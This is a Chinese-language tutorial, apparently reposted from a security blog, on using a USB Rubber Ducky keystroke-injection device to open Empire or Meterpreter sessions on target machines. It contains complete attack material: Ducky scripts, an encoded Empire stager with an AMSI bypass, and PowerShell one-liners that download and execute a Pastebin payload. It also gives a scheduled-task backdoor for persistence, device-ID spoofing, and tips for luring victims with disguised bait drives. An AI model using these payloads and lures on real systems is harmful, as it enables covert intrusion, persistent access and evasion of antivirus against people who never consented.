利用USB RUBBER DUCKY(USB 橡皮鸭)在目标机器上启动Empire或Meterpreter会话

news/2025/1/7 0:59:46/

今天我将教大家如何使用Rubber Ducky在渗透中建立Empire或Meterpreter会话连接。然而对于Ducky而言,想要完成大多数现实场景中的USB攻击,往往需要花费大量的时间去实践。本文概述了三种橡皮鸭速度的优化技术,以及最小化用户对Ducky的异常检测。

2.jpg

Rubber Ducky攻击向量

声东击西

当用户分散注意力时,随手将Ducky插入可访问的USB接口。

优点:能有效将Payload传递至目标系统;并且不易被用户发现。

缺点:这种方式通常时间较短,因此需要攻击者及USB的执行速度较快。其次,还需取决于对用户的欺骗以及USB接口的访问方便与否。

危险藏匿

在一些办公场所故意丢弃一个Ducky,例如接待处,停车场和浴室等这些地方通常成功率都相当高。为了不引起怀疑,我们可以将Ducky的标签更改为一些诱人的内容。除此之外,我们还可以利用联邦快递来传送Ducky,这将是一个很好的借口。

优点:显而易见相对于上种方式,你无需亲自去冒着被抓住的风险。当人们看到标有“2016度假照片”的USB时,好奇心总能驱使他们窥探。

缺点:用户在插入USB时会紧盯屏幕,因此容易发现问题。

神不知,鬼不觉

选择在深夜时间绕过物理安全控制,潜入无人值守的办公场所。

优点:一旦成功则不易被用户发现,且有足够的攻击时间。

缺点:风险巨大容易被抓住。

以上三种方式最常用的是前两种。可以看到这两种方式想要成功都必须有具备两个前提:速度和信任。下面我将通过优化Empire stager的传递执行时间,并尽可能的减少用户的怀疑。

标准方法

有关创建Empire stagers(传输器)的内容,请参阅Stagers 101。

使用Empire的stager/windows/ducky,我们得到以下结果:

DELAY 3000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRING powershell -W Hidden -nop -noni -enc WwBSAGUAZgBdAC4AQQBzAHMARQBNAGIATAB5AC4ARwBFAFQAVAB5AHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAVABGAGkARQBsAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQB0AFYAQQBsAFUAZQAoACQAbgBVAEwAbAAsACQAdABSAFUAZQApAH0AOwBbAFMAeQBTAFQAZQBtAC4ATgBFAFQALgBTAGUAcgB2AGkAQwBFAFAAbwBJAE4AdABNAEEATgBBAEcAZQBSAF0AOgA6AEUAWABwAEUAYwB0ADEAMAAwAEMATwBOAFQASQBOAFUARQA9ADAAOwAkAFcAQwA9AE4ARQBXAC0ATwBiAEoAZQBDAFQAIABTAHkAUwB0AEUATQAuAE4AZQBUAC4AVwBFAGIAQwBsAGkARQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAB3AGMALgBIAGUAQQBkAEUAUgBTAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAEUAQgBSAEUAUQB1AGUAcwBUAF0AOgA6AEQARQBGAGEAdQBMAHQAVwBFAEIAUAByAE8AeAB5ADsAJABXAEMALgBQAFIAbwBYAFkALgBDAFIARQBkAGUAbgB0AEkAQQBMAFMAIAA9ACAAWwBTAHkAcwBUAEUATQAuAE4ARQB0AC4AQwByAEUARABlAE4AdABpAEEAbABDAEEAQwBoAGUAXQA6ADoARABFAEYAQQBVAEwAVABOAEUAVABXAE8AUgBrAEMAUgBFAEQAZQBOAHQASQBhAGwAUwA7ACQASwA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAEMATwBkAGkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAWQB0AEUAcwAoACcAYwBJAHAAMABDADwASgAtAHMAbABUAF8AXgBAAGkANABQAEcALAA4AHgAWABGACsAZgBFAFIAMwB2AEQAfgBkACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIARwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABlAGEAZABFAHIAcwAuAEEARABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AeABiADEAcgBKAGoATABuAGwANQBKAGsAMABqADEATgAxAFYAZABoAHgAZwByAE8ANgArAFkAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMgA6ADgAMAAnADsAJAB0AD0AJwAvAGwAbwBnAGkAbgAvAHAAcgBvAGMAZQBzAHMALgBwAGgAcAAnADsAJABEAGEAVABBAD0AJABXAEMALgBEAE8AdwBOAGwAbwBhAGQARABhAFQAYQAoACQAcwBlAFIAKwAkAHQAKQA7ACQAaQBWAD0AJABEAEEAdABBAFsAMAAuAC4AMwBdADsAJABEAEEAdABhAD0AJABEAEEAdABBAFsANAAuAC4AJABEAGEAdABhAC4ATABFAG4ARwB0AEgAXQA7AC0ASgBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
ENTER

完成时间:约38秒

输入字符:1 (r) + 10 (powershell) + 1 (ENTER) + 2657 (payload) + 1 (ENTER) = 2670 字符

我们遇到的第一个问题是驱动程序问题。大多数机器之前从未运行或加载过Ducky(或者特定的VID/PID),所以你必须假设加载驱动程序,将是我们在物理攻击中相对耗时和必不可少的一部分。

乍一看,我们似乎可以选择直接从“运行”框启动base64编码命令来节约时间,但这是不可能的因为该框不会接受这么多的字符。

声东击西:在3秒内执行Pastebin

步骤1:BASE64解码STAGER

$ echo "WwBSAEUARgBdAC4AQQBTAFMAZ...ACkAfABJAEUAWAA=" | base64 -d
[REF].ASSemBLY.GetType('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFieLd('amsiInitFailed','NonPublic,Static').SeTVaLUE($NULl,$TruE)};[SYStEm.NeT.SeRvIcEPoIntMaNager]::EXPEcT100CoNtiNUe=0;$WC=New-ObjeCT SysTeM.NeT.WebCLIeNt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wC.HeAdeRs.ADD('User-Agent',$u);$WC.ProXy=[SystEm.NEt.WeBREqueSt]::DEfaULtWeBPRoXy;$wC.PRoXY.CreDENTIALS = [SYStEm.Net.CreDEnTIAlCaChe]::DEFAUltNEtworKCredENtIALS;$K=[SysTeM.TExT.ENcODING]::ASCII.GetBytES('cIp0C<J-slT_^@i4PG,8xXF+fER3vD~d');$R={$D,$K=$ARGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CouNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXoR$S[($S[$I]+$S[$H])%256]}};$Wc.HEadERs.ADD("Cookie","session=yf4qx5Kgt/VLttX7JIdbgtni/iQ=");$ser='http://192.168.1.2:80';$t='/login/process.php';$daTa=$WC.DOWNLOAdDAta($ser+$t);$Iv=$dAta[0..3];$DaTa=$daTA[4..$dAta.leNGTh];-JoiN[ChAr[]](& $R $DaTA ($IV+$K))|IEX

或者,你也可以使用Empire的multi/launcher将Base64选项设置为False来重新生成stager。

步骤2:将stager上传至Pastebin

将Base64解码的PowerShell复制粘贴至Pastebin并且保存原始路径。确保使用安全的https链接以避免检测。

示例请参阅:https://pastebin.com/raw/ani8ic5X

步骤3:创建一个POWERSHELL单线启动STAGER

powershell -ep bypass -w h -c "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/ani8ic5X')"

我们使用最小选项“-ep bypass”来绕过执行策略,而’-w h’可以帮助我们在用户界面隐藏PowerShell窗口。

步骤4:时间调整

默认的Empire时间(3000和1000)非常的保守。通过对不同系统的测试,我们可以将它改为以下值:

DELAY 500
GUI r
DELAY 100

步骤5:锁定USB VID和PID

要想进一步的隐藏Ducky,我们还需要修改USB的供应商ID(VID)和产品ID(PID)。因为我们只是执行键盘注入,所以让我们来欺骗微软(0x045E)通用的“键盘”(0xFFF8)。你可以在这里下载到Microsoft vidpid.bin文件,并将其内容另复制保存为vidpid.bin移放至Ducky根目录下。

$ cp msft-vidpid.bin /media/PATH/TO/DUCKY/vidpid.bin

步骤6:整合

完成时间:约3秒

输入字符:1 (r) + 114 (payload)+ 1 (ENTER) = 116 字符

DELAY 500
GUI r
DELAY 100
STRING powershell -ep bypass -w h -c "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/ani8ic5X')"
ENTER

下载pastebin-payload.txt,使用自己的方式交换Pastebin链接。

编译ducky有效载荷(更多信息,请参阅Rubber Ducky wiki):

$ java -jar duckencoder.jar -i pastebin-payload.txt -o /media/PATH/TO/DUCKY/inject.bin

危险藏匿:增加可信度

由于第二种方式涉及受害者与Ducky的直接交互,因此攻击必须具备较高的可信度。这里我们还将使用相同的Pastebin传送系统,首先我们要做的是准备好Ducky USB驱动器。

步骤1:将RUBBER DUCKY固件更新到Twin Duck

擦除并将Ducky固件更新到Twin Duck固件(截止本文发布其版本为c_duck_v2.1.hex)。有关更详细的固件更新说明请参阅:https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Flashing-ducky 。

1.安装dfu-programmer:

$ sudo apt-get update && sudo apt-get install dfu-programmer

2.删除Ducky的闪存卡,并按下按钮将Ducky插入主机。

3.擦除当前固件:

$ sudo dfu-programmer at32uc3b1256 erase

4.将固件更新为Twin Duck:

$ sudo dfu-programmer at32uc3b1256 flash --suppress-bootloader-mem c_duck_v2.1.hex

5. 重置Ducky使它再次工作:

$ sudo dfu-programmer at32uc3b1256 reset

步骤2:锁定USB VID和PID

这里我们来模拟最常见的USB闪存驱动器芯片组:Alcor Micro Corp的(0x058F)通用“Flash Drive”(0×6387)。你可以下载一个定制的Alcor Micro vidpid.bin文件,并将其复制到Ducky。

$ cp alcor-vidpid.bin /media/PATH/TO/DUCKY/vidpid.bin

步骤3:为你的驱动器编造一个故事

例如只是一个目标公司CFO的驱动器,或是一个刚入公司的实习生的,这都将足以引起人们的好奇和窥探。同时,一个好的故事也将对下一步的成败起关键作用。

步骤4:添加驱动标签

在Linux中向FAT16驱动器添加标签的最简单方法是使用GParted。

  1. 通过读卡器加载MicroSD卡。
  2. 启动GParted并切换到USB驱动器(通常是/dev/sdb)
  3. 卸载驱动器(分区->卸载)
  4. 右键单击并转到“标签文件系统”,然后选择一个符合驱动器故事的标签
  5. 点击“应用”

步骤5:进一步的伪装

为了避免一些不必要的情况发生,例如用户将USB移交至IT部门,或拔掉网线电源导致大面积的故障出现,我们需要打造一个具有更好“用户体验”的驱动器。

  • 在驱动器中添加虚拟内容(如图片,文档等),增加其可信度。(备注:添加NSFW的内容,使得受害者不太可能将驱动器移交给IT部门)
  • 将’inject.bin’和’vidpid.bin’隐藏在Windows系统上。你可以使用 wine attrib + h 文件名 完成此操作,但我发现将SD卡加载到Windows机器上手动隐藏文件更加可靠。

步骤6:使用之前的PASTEBIN方法设置注入

Air Gapped系统和离线笔记本电脑:从存储执行

在这个例子中我们将创建一个有效负载,以在遇到那些未连接到互联网的计算机时也能创建一个持久性的会话。当然,这个有效载荷只是一个PoC。由于许多步骤与上述步骤相同,以下我只会说明每个步骤的不同之处。

步骤1:将RUBBER DUCKY固件更新到Twin Duck

步骤2:添加驱动标签

步骤3:BASE64解码EMPIRE STAGER并将其上传到PASTEBIN

步骤4:在POWERSHELL中创建调度任务

backdoor.ps1(点击下载):

$PScommand = 'powershell -ep bypass -w h -enc '
$IEXPayload = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/ani8ic5X')"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($IEXPayload)
$encCommand = [Convert]::ToBase64String($bytes)
$null = schtasks /Create /SC MINUTE /TN Updater /TR "$PScommand $encCommand"

注意:在本例中,脚本被设置为每隔60秒就检查一次互联网的访问,但在实际环境中,建议最好每隔几个小时甚至一天进行一次检查。

步骤5:将BACKDOOR.PS1添加到橡皮鸭

为了尽可能的减少Ducky需要输入的字符数量,我们将其重命名为“b.ps1”。

$ cp backdoor.ps1 /media/PATH/TO/DUCKY/b.ps1

步骤6:创建一个POWERSHELL单线启动BACKDOOR

我们需要找到 DUCKY SD的挂载字母,程序首先会寻找标有“DUCKY”的驱动器,然后提取该驱动器的字母,并将PowerShell文件追加到字符串并执行该脚本。

Windows 7-10(gwmi方法) – 104个字符

powershell -ep bypass -w h -c ".(((gwmi Win32_Volume | ? {$_.Label -eq 'DUCKY'}).DriveLetter)+'\b.ps1')"

Windows 8-10(Get-Volume方法) – 94个字符

powershell -ep bypass -w h -c ".(((Get-Volume -FileSystemLabel DUCKY).DriveLetter)+':\b.ps1')"

步骤7:设置时间

DELAY 2800
GUI r
DELAY 150

步骤8:锁定USB VID和PID

让我们再次来模拟Alcor Micro Corp的(0x058F)通用“Flash Drive”(0×6387)。你可以在这里下载。

$ cp alcor-vidpid.bin /media/PATH/TO/DUCKY/vidpid.bin

步骤9:整合(GET-VOLUME方法)

完成时间:约9秒

输入字符: 1 (r) + 94 (payload)+ 1 (ENTER) = 96 字符

DELAY 2800
GUI r
DELAY 150
STRING powershell -ep bypass -w h -c ".(((Get-Volume -FileSystemLabel DUCKY).DriveLetter)+':\b.ps1')"
ENTER

点击下载Get-Volume有效载荷。你还可以在这里下载到gwmi版本。

总结

在此前我们使用默认的Empire Ducky脚本,而它有足足2,670个字符,并且执行所花费时间也达到了38秒之久。在进行了相应的优化后,我们使用基于web的Empire stager,将执行时间缩短到了3秒,并且输入字符也减少到了116个。这意味只要3秒钟攻击者就可以成功渗透目标,并且难以被发现。我们还学习到如何创建一个具有较高可信度和用户体验的USB驱动器。这些人为因素的添加,大大降低了检测和事件报告率。最后,我们检查了从Ducky的内部磁盘执行脚本的PoC,即使计算机未连接到互联网时也能创建一个持久性的会话。以上讨论的所有技术都是无文件式攻击,因此对于绕过AV也有一定的效果。为了增加攻击的更加隐蔽性,在这里我建议大家尽可能的使用自己的基础设施/托管而不是Pastebin,因为许多这类比较知名的网站,在企业网络环境中极易被阻断和隔离。


http://www.ppmy.cn/news/350175.html

相关文章

BADUSB 橡皮鸭 键盘注入漏洞 USB协议漏洞

摘要&#xff1a; BadUSB最早是在2014年的黑帽大会上研究人员JakobLell和Karsten Nohl提出并展示的。不同于老式的U盘病毒&#xff0c;它利用了USB协议中的一个漏洞&#xff0c;通过模拟键盘、鼠标、网卡等从而让目标电脑执行恶意代码&#xff0c;达到控住主机或者窃取敏感信息…

制作Wi-Fi Ducky远程HID攻击设备

1、介绍WIFI DUCKY 它是一个Wi-Fi控制的BadUSB设备来远程执行Ducky Scripts。 使用充当键盘的USB设备来注入攻击&#xff0c;Hak5 的 USB Rubber Ducky 是这种攻击的黑客小工具。它引入了一个简单的脚本语言&#xff0c;称为Ducky Script&#xff0c;这个项目也是这样使用的。 …

teensy 制作键盘 linux,利用Arduino快速制作Teensy BadUSB

*本文原创作者:维克斯 0x00 介绍 本文想以较简单的方式,叙述Arduino版BadUSB的制作过程。我知道在这之前已经有很多前辈都写过相关的文章,但小白可能还有点迷糊,所以这篇文章是快速带大家入门了解,我也是菜B大神不要喷,谢谢~。 “BadUSB”是计算机安全领域的热门话题之一…

PNAS:勘探地球物理学论文

阅读 《Sensing prior constraints in deep neural networks for solving exploration geophysical problems dendrimers》 题目译为《深度神经网络中用于解决勘探地球物理问题的感知先验约束》 研究意义 该研究提出三种可能的策略&#xff0c;以有效地讲地质和/或地球物理约…

Qemu 逃逸基础知识

QEMU 与 KVM 架构 QEMU 与 KVM 的完整架构如下图所示。 QEMU 与 KVM 架构整体上分为 3 个部分&#xff1a; VMX root 模式的应用层&#xff0c;即图中左上部分&#xff0c;属于 qemu 进程。VMX root 模式的内核层&#xff0c;即图中下半部分&#xff0c;属于 kvm 驱动。VMX …

完型填空技巧

完形中分值最高的是逻辑关系题&#xff0c;逻辑关系分为两种&#xff0c;一种是选项就是逻辑关系的&#xff0c;例: Given the advantages of electronic money, you might thinkthat we would move quickly to the cashless society in which allpayments are made electronic…

Vue3_ElementPlus_简单增删改查(2023)

Vue3&#xff0c;Element Plus简单增删改查 代码&#xff1a;https://github.com/xiaoming12318/Vue3_ElementPlus_CRUD.git 环境&#xff1a; Visual Studio Code Node.js 16.0或更高版本&#xff0c;https://nodejs.org/en axios 快速上手&#xff1a; 如果已经有16.0及…

英雄联盟祖安服务器要维护多久,英雄联盟道歉IG

我们理解玩家对于纪念图标的期待&#xff0c;正如前面第三波福利提到的&#xff0c;我们在本次特别准备了全球总决赛夺冠纪念皮肤&#xff0c;也是希望给玩家们带来更具有纪念价值的福利内容。 是否在iG夺冠后&#xff0c;官方资源主要在推广K/DA&#xff0c;不重视iG&#xff…